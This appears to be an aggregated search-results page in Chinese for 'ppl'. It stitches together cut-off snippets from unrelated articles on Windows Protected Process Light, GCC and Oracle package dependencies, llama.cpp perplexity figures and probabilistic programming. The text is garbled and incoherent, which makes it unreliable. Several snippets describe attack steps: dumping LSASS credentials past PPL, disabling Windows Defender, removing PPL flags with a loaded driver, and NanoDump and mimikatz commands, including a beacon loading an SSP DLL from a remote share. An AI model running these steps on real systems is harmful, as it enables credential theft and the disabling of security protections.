PP/PPL(s)背景概念 首先,PPL表示Protected Process Light,但在此之前,只有Protected Processes。...攻击PPL的Lsass进程 这里主要讨论lsass中开启了PPL之后dump密码的手法。...由于 PPL 不检查已知 DLL 的数字签名,因此以后可以使用它来执行 DLL 劫持攻击并在 PPL 中执行任意代码。...的保护依然存在,但是我们已经可以在AVP.exe中执行任意代码,也就是注入了ppl的进程,继承了ppl的保护。...信标作为 WinTCB PPL 运行。
描述 可以关闭Windows Defender服务并通过提升权限删除ppl保护,然后删除Windows Defender中的DLL和其他文件,使Windows Defender服务无法运行,从而导致Windows...).一般来说可执行文件必须使用特殊证书进行签名,然后才有可能使用保护进程 (PPL)。...也就是说我们可以关闭Windows Defender服务的PPL。经过我们测试知道服务 ACL 根本不允许 SYSTEM 用户和管理员组修改或停止 Windows Defender 服务。...但它允许 WinDefend 和 TrustedInstaller 修改或停止 Windows Defender 服务的ppl,那么上面我们拥有了完整的TrustedInstaller权限。...Program Files\Windows Defender Advanced Threat Protection C:\Program Files (x86)\Windows Defender 在有PPL
本文将介绍 Windows 的 PPL 安全机制,以及在实验环境下如何绕过该机制,从而实现对 PPL 的进程进行动态调试。...的部分核心进程设置了 PPL 保护: 对于安全研究来说,PPL机制最直观的感受就是即便使用管理员权限也无法 attach 这个进程进行调试: 通过官网文档(https://learn.microsoft.com...0x03 本地调试bypass 参考资料 通过上文对 PPL 机制的介绍,我们知道 PPL 的标识位是以 _PS_PROTECTION 结构存放于 EPROCESS 进程对象中,虽然本地内核调试无法控制程序执行流...type= kernel start= demand binPath= [src]remove_ppl.sys # 查看服务信息 sc.exe queryex remove_ppl # 启动驱动程序/...服务 sc.exe start remove_ppl 运行驱动程序,并使用 Process Explorer 查看,所有进程的 PPL 标识都被去除了: 除了以上实验代码外,也可以参考更加完善的 PPL
Linux 编译安装 GCC 4.8 详见: Linux 编译安装 GCC 4.8 GCC4.8发布啦,这个脚本在之前4.7的基础上做了点改进,移除一些过时的组件,增加了检测不到时自动下载源码包 PS:...4.8.1开始全面支持C++11特性,并且脱离了ppl库,gdb也开始脱离ppl库了 编译安装 GCC 4.8.X 在执行 install.sh 脚本前安装 ncurses-devel 和 python-devel...pretty-printer) 2013-10-29 更新gcc到4.8.2,更新gdb到7.6.1,更新GMP到5.1.3 2013-12-13 更新binutils到2.24,更新gdb到7.6.2,移除对ppl...的依赖,显式开启gold等一些选项,显式开启链接时优化选项 2014-05-23 更新gcc到4.8.3,更新gdb到7.7.1,完全移除对ppl的依赖,同步gcc4.9编译脚本中修复的一些问题,增加编译选项等
Linux编译安装GCC 4.7 详见: Linux编译安装GCC 4.7 准备环境及依赖项 支持 ISO C90 的编译器 用于创建Ada编译器的GNAT 支持POSIX的shell或GNU bash...mpc库 版本0.8.1及以上 (可由GNU镜像列表 http://www.gnu.org/prep/ftp.html 或自动选择最佳镜像 http://ftpmirror.gnu.org 下载 ) ppl...库 版本0.11及以上 (此处可下载 http://www.cs.unipr.it/ppl/Download/) isl 版本 0.10 (可由GNU镜像列表 http://www.gnu.org/prep.../ftp.html 或自动选择最佳镜像 http://ftpmirror.gnu.org 中gcc目录中的infrastructure目录下载 ) cloog-ppl 版本0.15 或cloog 版本...perl 5.10.1 bzip2 1.0.5 依赖库: + gmp 5.0.4 or gmp 5.0.5 + mpfr 3.1.0 + mpc 0.8.2 or mpc 0.9 + ppl
(1) 依赖包的安装 Linux下安装Oracle,除了系统配置参数,我觉得依赖包的安装是另一个比较琐碎的操作。...cloog-ppl >= 0.15 is needed by gcc-4.4.7-4.el6.x86_64 04. ...cpp = 4.4.7-4.el6 is needed by gcc-4.4.7-4.el6.x86_64 不仅说明需要两个依赖包,还说明了需要有对应的版本, cloog-ppl需要大于等于0.15版本的...cpp需要4.4.7-4.el6版本的 之后按照他的版本要求安装即可: 01.rpm -ivh cloog-ppl-0.15.7-1.2.el6.x86_64.rpm 02.warning: cloog-ppl...03.Preparing... ########################################### [100%] 04. 1:cloog-ppl
>= 0.15 for package: gcc-4.4.7-17.el6.x86_64 -->Running transaction check --->Package cloog-ppl.x86_...0.15.7-1.2.el6 will be installed -->Processing Dependency: libppl_c.so.2()(64bit) for package: cloog-ppl...-0.15.7-1.2.el6.x86_64 -->Processing Dependency: libppl.so.7()(64bit) for package: cloog-ppl-0.15.7-1.2.../bin/grep -E checkingbuild system type... x86_64-unknown-linux-gnu checkinghost system type... x86_64...-unknown-linux-gnu checkingtarget system type... x86_64-unknown-linux-gnu configure: configure:Configuring
基于Linux安装过Oracle的童鞋们都应该清楚,安装Oracle的确是一件比较费时费力的差事,因为仅仅是前期的rpm包,内核参数,创建用户等等这些个步骤都让那些新手不免眼花缭乱,一不留神,就导致最终的安装过程中报错而不得不从头来过...现在基于Oracle Linux,Oracle仅仅需要通过安装oracle-rdbms-server-11gR2-preinstall RPM包即可全部搞定其余未安装的RPM包,解决之间的依赖关系,配置内核参数等等...客官,正在基于Oracle Linux 安装Oralce 11g?那就接着往下看。...即将需要安装的部分的enabled的值置为1 [ol6_u3_base] name=Oracle Linux $releasever Update 3 installation media copy (...6 How I Simplified Oracle Database Installation on Oracle Linux 5
PID; 9、不会调用dbghelp或其他库,所有的转储逻辑都在NanoDump中实现; 10、支持进程Fork; 11、支持快照; 12、支持句柄拷贝; 13、支持MalSecLogon; 14、支持PPL...NanoDump; 工具安装&配置 首先,我们需要使用下列命令将该项目源码克隆至本地: git clone https://github.com/helpsystems/nanodump.git Linux...编译 在Linux系统上,我们需要使用MinGW来编译NanoDump源码: make -f Makefile.mingw Windows编译 在Windows系统上,我们需要使用MSVC来编译NanoDump...来获取转储文件中的敏感信息: mimikatz # sekurlsa::minidump mimikatz # sekurlsa::logonPasswords full 如果你使用的是Linux...在LSASS中以SSP加载NanoDump(远程): beacon> load_ssp \\10.10.10.10\openShare\nanodump_ssp.x64.dll 转储LSASS并绕过PPL
要注意的是,如果是从iso中找rpm,gcc和cpp这些的安装,是有依赖顺序的,要按照如下顺序进行安装,不同的Linux版本iso,对应包的版本号可能不同,可以用通配符进行检索, rpm -ivh glibc-common...x86_64.rpmrpm -ivh glibc-devel-2.12-1.47.el6.x86_64.rpmrpm -ivh mpfr-2.4.1-6.el6.x86_64.rpmrpm -ivh ppl...-0.10.2-11.el6.x86_64.rpmrpm -ivh cloog-ppl-0.15.7-1.2.el6.x86_64.rpmrpm -ivh cpp-4.4.6-3.el6.x86_64....-0.10.2-11.el6.x86_64.rpm rpm -ivh cloog-ppl-0.15.7-1.2.el6.x86_64.rpm rpm -ivh cpp-4.4.6-3.el6.x86_64...Oracle安装历史文章, 《安装Oracle Linux碰见的几个问题》 《11g Grid Control安装过程的一些“坑”》 《Oracle 12c CC安装碰见的认证问题》 2.
git clone https://github.com/openppl-public/ppl.cv.git cd ppl.cv git checkout tags/v0.6.2 -b v0.6.2...示例环境是 cuda11.1 ,所以下载了如下的压缩包: -TensorRT-8.2.1.8.Linux.x86_64-gnu.cuda-11.4.cudnn8.2.tar.gz -cudnn-11.3...-linux-x64-v8.2.1.32.tgz 解压上述两个压缩包,安装 TensorRT。...tar -xvf TensorRT-8.2.1.8.Linux.x86_64-gnu.cuda-11.4.cudnn8.2.tar.gz tar -xvf cudnn-11.3-linux-x64-v8.2.1.32....tgz pip install TensorRT-8.2.1.8/python/tensorrt-8.2.1.8-cp37-none-linux_x86_64.whl 4.
Linux 编译安装 GCC 4.8 详见: Linux 编译安装 GCC 4.8 GCC4.8发布啦,这个脚本在之前4.7的基础上做了点改进,移除一些过时的组件,增加了检测不到时自动下载源码包 PS:...4.8.1开始全面支持C++11特性,并且脱离了ppl库,gdb也开始脱离ppl库了 编译安装 GCC 4.8.X 准备环境及依赖项 支持 ISO C++ 98 的编译器(GCC 4.7.2 的中期一个...2013-10-29 更新gcc到4.8.2,更新gdb到7.6.1,更新GMP到5.1.3 2013-12-13 更新binutils到2.24,更新gdb到7.6.2,移除对ppl...的依赖,显式开启gold等一些选项,显式开启链接时优化选项 2014-05-23 更新gcc到4.8.3,更新gdb到7.7.1,完全移除对ppl的依赖,同步gcc4.9编译脚本中修复的一些问题
至于量化后的产物,则是各种设备通用的,你可以在 Windows 量化后给 Linux 或者 macOS 设备使用。你也可以使用有 CPU 和 GPU 的设备,量化后给只有 CPU 的设备使用。...ppl @ LLaMA-v1-7B 12 or Q3_K : alias for Q3_K_M 11 or Q3_K_S : 2.75G, +0.5551 ppl @ LLaMA-v1...4.33G, +0.0400 ppl @ LLaMA-v1-7B 17 or Q5_K_M : 4.45G, +0.0122 ppl @ LLaMA-v1-7B 18 or Q6_K...: 5.15G, -0.0008 ppl @ LLaMA-v1-7B 7 or Q8_0 : 6.70G, +0.0004 ppl @ LLaMA-v1-7B 1 or F16...8.9 main: build = 1622 (8a7b2fa) main: built with cc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0 for x86_64-linux-gnu
|loss 6.21 |ppl 497.23 | epoch 1| 700/ 1452 batches | lr 4.00000 | ms/batch245.87236|loss 6.12 |ppl...|loss 5.89 |ppl 360.10 | epoch 1| 1300/ 1452 batches | lr 4.00000 | ms/batch247.16889|loss 5.77 |ppl...|loss 5.56 |ppl 259.60 | epoch 2| 500/ 1452 batches | lr 4.00000 | ms/batch245.97209|loss 5.53 |ppl...|loss 5.48 |ppl 240.21 | epoch 2| 1100/ 1452 batches | lr 4.00000 | ms/batch245.74290|loss 5.51 |ppl...|loss 5.28 |ppl 196.96 | epoch 3| 600/ 1452 batches | lr 4.00000 | ms/batch246.82980|loss 5.35 |ppl
概率编程语言(PPL)领域正经历着机器学习技术快速发展带来的奇迹般的复兴。在短短的几年里,PPL 已经从一个模糊的统计研究领域发展出十几个活跃的开源方案。...PPL 是机器学习 pipeline 的常规组件,但其实现仍然具有挑战性。虽然市场上的 PPL 显著增加,但大多数 PPL 仍局限于研究工作,不适用于实际的应用。...然而,为了做到这一点,Gen 需要在 PPL 的两个关键特征上进行精细平衡。 表达性与效率 现代 PPL 最大的挑战是在建模表达性和推理效率之间取得平衡。...通用 PPL 应能实现两个基本效率向量: 1)推理算法效率:一个通用的 PPL 应该允许开发人员在不牺牲底层组件性能的情况下创建定制的、高度复杂的模型。...近年来,PPL 有了许多强大的替代方案: Edward Edward 是一种用 Python 编写的图灵完全概率编程语言(PPL)。
除了这三个主流的框架,还有一些也经常被使用的框架,例如PPL。但是PPL现在还没有开源,可能商汤还是想「有所保留」的。...其实ncnn开源的时候PPL就出来说过他们的性能更好,PPL其实也是被开发者们经常使用的框架之一了。 百度开源了一个叫做Padle-Lite的框架。...MACE是一个深度学习推理框架,针对Android,iOS,Linux和Windows设备上的移动异构计算进行了优化。
支持模型和功能对比PPL LLM只支持baichuan、chatglm、llama三个模型,Tensor-LLM支持几乎所有大模型。...PPL LLM需要对huggingface原模型先转模型参数,LLama还需要先拆分模型,再合并模型。最后需要导出onnx模型,并支持根据GPU资源分片。...ppl.pmx/model_zoo/llama/huggingface at master · openppl-public/ppl.pmx (github.com)总结:用PPL LLM需要运行多个步骤...用户使用方式PPL LLMW8A16/W16A16:原模型-->模型转换-->ppl.pmx导出onnx(可选择weight int8量化)-→部署云端服务W8A8:原模型-->模型转换-->ppl.pmx...PPL LLM没有依赖
glibc-devel-2.12-1.80.el6.x86_64.rpm –force –nodeps rpm -ivh libgomp-4.4.6-4.el6.x86_64.rpm rpm -ivh ppl...-0.10.2-11.el6.x86_64.rpm rpm -ivh cloog-ppl-0.15.7-1.2.el6.x86_64.rpm rpm -ivh gcc-4.4.6-4.el6...rpm -ivh gcc-c++-4.4.6-4.el6.x86_64.rpm –force –nodeps 中途遇到的几个问题: 1、/usr/libexec/gcc/x86_64-redhat-linux
Dependency: cpp = 4.4.7-11.el6 for package: gcc-4.4.7-11.el6.x86_64--> Processing Dependency: cloog-ppl...0.15.7-1.2.el6 will be installed--> Processing Dependency: libppl_c.so.2()(64bit) for package: cloog-ppl...-0.15.7-1.2.el6.x86_64--> Processing Dependency: libppl.so.7()(64bit) for package: cloog-ppl-0.15.7-1.2....el6 varnish-4.0 371 kInstalling for dependencies: cloog-ppl...x86_64 2.4.1-6.el6 base 157 k ppl
领取专属 10元无门槛券
手把手带您无忧上云
